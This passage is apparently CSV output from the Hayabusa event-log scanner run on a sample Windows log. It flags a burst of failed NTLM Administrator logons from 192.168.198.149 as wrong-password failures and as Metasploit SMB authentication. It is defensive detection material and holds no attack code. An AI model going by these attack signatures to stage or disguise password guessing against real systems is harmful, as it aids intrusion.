SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v3YM3zaZk64qqq7K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.160 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mOLbk23zOqQLZYZU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.193 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.243 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v0tlyXqvCQJVqaB5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.243 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.291 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: npjQlHcGls5gENng : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.291 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7buinUqketmW3Ib6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.385 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Rs5gYGs6JBf2yV1J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.422 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 67hYMvtmbrmv5LHn : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.475 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gtV42zBnWwRCLfJS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.521 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jnaPNm28FvbFfM8L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.569 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oCEvKO14gPFHAZIA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.620 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iJJyXCm1YOI2uIAS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.661 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.717 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MNAScx4qMKxCJQdU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.717 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BKTHsNA29ZnPHCHQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.752 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: CjvAb3sjN0PM8my4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wYQ6HuRSMh8DXzMf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.836 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SZgejUxgojDE1kR3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.885 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2L4yO411OUnkRGWQ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.929 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.986 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O3mGCNGFML75P7w4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.986 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6CBslPz31UACz0wR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.041 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.077 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F4Y8V0wB6unpmFXA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.077 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aXSbx81GD6dYgHtv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.125 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.172 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dWbnppJfJ0Ll9oLW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.172 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eoUjizV5iXImPGTe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.201 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: HHNG9oylnT46IObg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.245 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1LUeAisNPQULjD2t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.297 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2sB5MlRw4Ox1OWdN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.422 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3WaklWtKd8QByH8M : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.491 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nzvyy6CUk43SVxZW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.557 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xeolvnD92qP1dJPO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.601 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KDvRwPbu6yQH2pEf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.636 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.681 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vxKdofXKKkCLn2n6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.681 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.730 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IkO9p50Q9iFolbmb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.730 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p01SZCA784xmPMe2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.780 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: XKaI3FHBbBXvVsES : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.825 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mmUk6sW8QreDIZZ5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.873 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k0w9SSWaaTX7chM9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.916 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 46vgsyX5Wxn2rupf : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:36.961 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.006 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PV8628a8GNKoFyzM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.006 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mksBFEFzkC08dB4o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.047 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U6QlHT6Bp63JDehd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.080 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tRj4fxcRY0Esegl6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.157 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dj6zQjZwGEBo0zNt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.157 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.202 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: imfY1T2VMoaqDSUd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.202 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.243 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: qvPP8UYn9fLpRYl4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.243 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rFTGQ5tzNI5k58cK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.289 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F8Zj3g1WiTLx8OlJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.329 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:37.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x2Lr6j8Qt4xEmZZF : IP Address: 192.168.198.149 : AuthPackage: 
